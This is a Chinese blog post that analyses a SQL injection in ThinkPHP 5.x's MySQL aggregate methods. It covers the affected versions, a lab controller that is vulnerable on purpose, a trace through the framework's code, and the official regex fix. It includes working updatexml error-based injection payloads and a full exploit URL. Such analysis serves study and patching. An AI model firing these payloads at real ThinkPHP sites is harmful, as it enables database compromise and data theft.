thinkphp mysql函数_ThinkPHP5x-Mysql 聚合函数相关方法注入

最新推荐文章于 2021-08-14 01:05:52 发布
最新推荐文章于 2021-08-14 01:05:52 发布
阅读量198 收藏
点赞数
文章标签: thinkphp mysql函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42177768/article/details/114007459
版权

漏洞概述

摘抄:

本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。

不同版本 payload 需稍作调整:

5.0.0~5.0.21 、 5.1.3~5.1.10 : id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23

5.1.11~5.1.25 : id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23

漏洞环境

composer create-project topthink/think=5.0.10 tp5010

composer.json文件:

"require": {

"php": ">=5.6.0",

"topthink/framework": "5.1.25"

},

更新:执行composer update

接下来设置漏洞点和配置数据库

将?application/index/controller/Index.php?文件代码设置如下:

namespace?app\index\controller;

class?Index

{

????public?function?index()

????{

????????$options?=?request()->get(‘options‘);

????????$result?=?db(‘users‘)->max($options);

????????var_dump($result);

????}

}

创建数据库信息如下:

create database tpdemo;

use tpdemo;

create table users(

id int primary key auto_increment,

username varchar(50) not null

);

insert into users(id,username) values(1,‘wtz‘);

在?config/database.php?文件中配置数据库相关信息

开启?config/app.php?中的?app_debug?和?app_trace

漏洞分析

payload:

http://127.0.0.1:88/tp51/public/index.php/index/index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1)%20from%20users%23

20200421182219450798.png

照例先去github上去找安全更新

20200421182219678346.png

20200421182219786749.png

主要就是代码中多了利用正则匹配检测特殊字符

我们开始利用debug分析代码

先补充前置知识:

1:我们get方式提交的数据都会通过input?方法获取数据,并通过?filterValue?方法进行简单过滤,但是根本没有对数组的键进行过滤处理。

20200421182219882456.png

2:用户输入的数据会原样进入框架的?SQL?查询方法中:(这个点得记住,框架的sql查询方法先进入?Query?类)

首先我们的入口是query类中的max方法

20200421182221011405.png

去看aggregate方法

20200421182221112972.png

去connection类看这个方法

20200421182221195983.png

看到这里经由parseKey方法处理,前面还有一个this->builder方法。

这个根据前面的经验就是继承于builder类中的select方法来生成我们的查询语句。

我们先看parseKey是怎么处理的我们的数据

parseKey?方法主要是对字段和表名进行处理,这里只是对我们的数据两端都添加了反引号。

20200421182221292666.png

这样看可能不是很清晰,自己单步调试一下就很清楚了。

可以看到最后返回了$key的值。

然后下一步:

20200421182221378607.png

回到$this->value方法

我们去看看builder类中的select方法。

20200421182221490916.png

在?select?方法中,程序会对?SQL?语句模板用变量填充,其中用来填充?%

FIELD%?的变量中存在用户输入的数据。

这里我们只看

$this->parseField方法,因为这里面的数据我们可控

20200421182222818115.png

20200421182222945073.png

20200421182223137463.png

这里只是把他用,拼接,返回了我们的payload。即使使用了parsekey处理数据,但是对我们的paylaod没有影响。

最终直接替换进?SQL?语句模板里,导致?SQL注入漏洞?的发生

20200421182224243951.png

ps:这个payload的限制就是payload前半部分的id`) from member必须是存在的字段名和表名,否则前半部分就会报错。用来闭合嘛很简单。

漏洞修复

官方的修复方法是:当匹配到除了?字母、点号、星号?以外的字符时,就抛出异常。

20200421182224387511.png

总结

七月火师傅的图:

20200421182224500797.png

参考

Dilwanga
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP5函数详解系列
04-26
ThinkPHP5函数详解系列,thinkPHP初学者的入门学习资料。 这是一个CHM类型的文件,如果打不开,请右击,打开属性窗口,在属性窗口的右下角单击“解除锁定”按钮即可。
ThinkPHP中__initialize()和类的构造函数__construct()用法分析
10-25
主要介绍了ThinkPHP中__initialize()和类的构造函数__construct()用法,以实例形式分析了ThinkPHP中类的初始化时构造子类的方法,是采用ThinkPHP进行面向对象程序设计中比较重要的概念,需要的朋友可以参考下
ThinkPH5 SQL注入Mysql 聚合函数
LYJ20010728的博客
08-14 385
ThinkPH5 SQL注入Mysql 聚合函数)漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于所有 Mysql 聚合函数相关方法,由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生 漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 初始配置 获取测试环境代码 composer create-project --prefer-d
MySQL+SQL函数大全
专注于.NET和JS的开发和研究
12-07 3966
MySQL函数大全》[color=red]字符串函数[/color]ASCII(str)  返回字符串str的第一个字符的ASCII值(str是空串时返回0)mysql> select ASCII(2);  -> 50mysql> select ASCII(2);  -> 50mysql> select ASCII(dete);  -> 100ORD(str)  如果字符串str
thinkphp mysql函数_php封装的数据库函数与用法示例【参考thinkPHP
weixin_29611573的博客
01-19 209
本文实例讲述了php封装的数据库函数与用法。分享给大家供大家参考,具体如下:从Thinkphp里面抽离出来的数据库模块,感觉挺好用common.php:/*** 通用函数*///包含配置文件if (is_file("config.php")) {C(include 'config.php');}if (!function_exists("__autoload")) {function __auto...
thinkphp mysql函数调用_用一个函数解决ThinkPHP 连接 MySQL与 MongoDB
weixin_34404599的博客
01-25 263
用一个函数解决ThinkPHP 连接 MySQL与 MongoDB,请注意M函数1. config.php设置//.配置MySQL数据库'DB_MYSQL' => array('db_type'=>'mysqli','db_user'=>'用户名','db_pwd'=>'密码','db_host'=>'127.0.0.1','db_port'=>'3306','...
ThinkPHP6.0以上兼容mysql下JSON_CONTAINS使用
12-08
Thinkphp6.0以上版本在查询MySql数据表中JSON类型数据下使用JSON_CONTAINS函数
tp5-api-master_termjtv_thinkphp5_tp_system-master_
10-03
基于thinkphp5开发的管理后台程序
thinkphp_thinkphp_thinkphp5_
09-29
thinkphp开发模板,把常用的功能都写好了,可以直接使用
ThinkPHP5+WebSocket+MySQL实现聊天室
04-26
实现流程 一、配置 1、打开sockets扩展 2、检查sockets扩展是否开启 3、配置环境变量 4、测试配置是否成功 二、实现流程 三、代码 四、运行php
thinkphp mysql函数调用_ThinkPHP5中的公共函数调用问题
weixin_28993311的博客
01-30 400
ThinkPHP 3.2.3中调用公共函数是在Application/Common/Common/function.php文件里那么在ThinkPHP 5 中公用函数应该写在哪里?是在application文件夹下的common.php里么,还是我写在application下的common文件夹里新建一个function.php?答一,在TP5中,公用的函数、手动注册的路由等,都是放在 \app...
thinkphp mysql函数_用一个函数解决ThinkPHP 连接 MySQL与 MongoDB
weixin_32029863的博客
01-30 101
用一个函数解决ThinkPHP 连接 MySQL与 MongoDB,请注意M函数1. config.php设置//.配置MySQL数据库'DB_MYSQL'=>array('db_type'=>'mysqli','db_user'=>'用户名','db_pwd'=>'密码','db_host'=>'127.0.0.1','db_port'=>'3306','...
thinkphp mysql函数调用_PHP_获取php页面执行时间,数据库读写次数,函数调用次数等(THINKphp),THINKphp里面有调试运行状态的 - phpStudy...
weixin_39609822的博客
01-30 98
获取php页面执行时间,数据库读写次数,函数调用次数等(THINKphp)THINKphp里面有调试运行状态的效果:Process:0.2463s (Load:0.0003s Init:0.0010s Exec:0.1095s Template:0.1355s )|DB:13 queries 0 writes| Cache:2 gets,0 writes|UseMem:415 kb|LoadFil...
thinkphp mysql函数_thinkphp对数据库操作有哪些内置函数
weixin_35730840的博客
01-30 253
getModelName() 获取当前Model的名称getTableName() 获取当前Model的数据表名称switchModel(type,vars=array()) 动态切换模型table() 设置当前操作的数据表field() 设置要查询的数据字段where() 设置查询或者操作条件data(data) 设置数据对象order(order) 设置排序limit(limit) 查询限制p...
thinkphp5 sql函数
liuxin_0725的专栏
12-13 2118
count用法   字段写在count里面 Db::table('ys_users_parent')->count('distinct parent'); 条件搜索加where  Db::table('pay_order')->where('pay_time>0')->count(); $kaishi = strtotime('1 minute',strtotime($input_d
thinkphp5 mysql助手_ThinkPHP5-数据库基本操作
weixin_32784349的博客
01-19 317
一、数据库配置1、在应用目录或者模块目录下面的database.php中添加下面的配置参数:return [// 数据库类型'type' => 'mysql',// 数据库连接DSN配置'dsn' => '',// 服务器地址'hostname' => '127.0.0.1',// 数据库名'database' => 'thinkp...
thinkphp mysql操作数据库_thinkPHP数据库操作
weixin_28929201的博客
01-30 940
thinkPHP如果要对数据库操作,一般来说首先要做的是在配置文件中链接数据库,然后用M方法实例化一张表,然后就是对表的操作了可以开启调试功能查看程序执行的sql语句:1.开启调试功能(默认是已经开启过的)define('APP_DEBUG',true)2.设置配置文件,开启页面trace(注意:如果没有在控制器里输出模板,不会出现调试小图标,即要写:$this->display();)'S...
mysql 常用的函数_MySQL常用的函数
weixin_28917337的博客
01-27 87
在使用1.MySQL字符串类CHARSET(str) //返回字符串字符集CONCAT (string2 [,… ]) //连接字符串INSTR (string ,substring ) //返回substring首次在字符串中出现的位置,不存在返回0LCASE (string ) //字符串转换成小写LEFT (string ,length ) //从字符串中的左边起取length个字符LENG...
thinkphp mysql排名_thinkPHP统计排行与分页显示功能示例
最新发布
05-24
以下是一个使用 ThinkPHP 进行排名统计和分页显示的示例代码: 1. 控制器代码: ``` public function rank() { $map['status'] = 1; $list = Db::name('article')->where($map)->field('id, title, views')->order('views desc')->paginate(10); $this->assign('list', $list); return $this->fetch(); } ``` 2. 视图代码: ``` <table> <thead> <tr> <th>排名</th> <th>标题</th> <th>浏览量</th> </tr> </thead> <tbody> <?php $i = ($list->currentPage() - 1) * $list->listRows() + 1; ?> <?php foreach ($list as $vo): ?> <tr> <td><?php echo $i++; ?></td> <td><?php echo $vo['title']; ?></td> <td><?php echo $vo['views']; ?></td> </tr> <?php endforeach; ?> </tbody> </table> <div class="pagination"> <?php echo $list->render(); ?> </div> ``` 以上代码中,我们使用了 `Db::name()` 方法来获取文章列表,通过 `field()` 方法指定需要的字段,使用 `order()` 方法按照浏览量降序排列,然后使用 `paginate()` 方法进行分页处理。 在视图中,我们使用了 `$list` 变量来循环遍历文章列表,并使用 `currentPage()` 和 `listRows()` 方法计算出当前页数和每页显示行数,再通过循环计算得出文章的排名。最后,我们使用 `render()` 方法来生成分页链接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值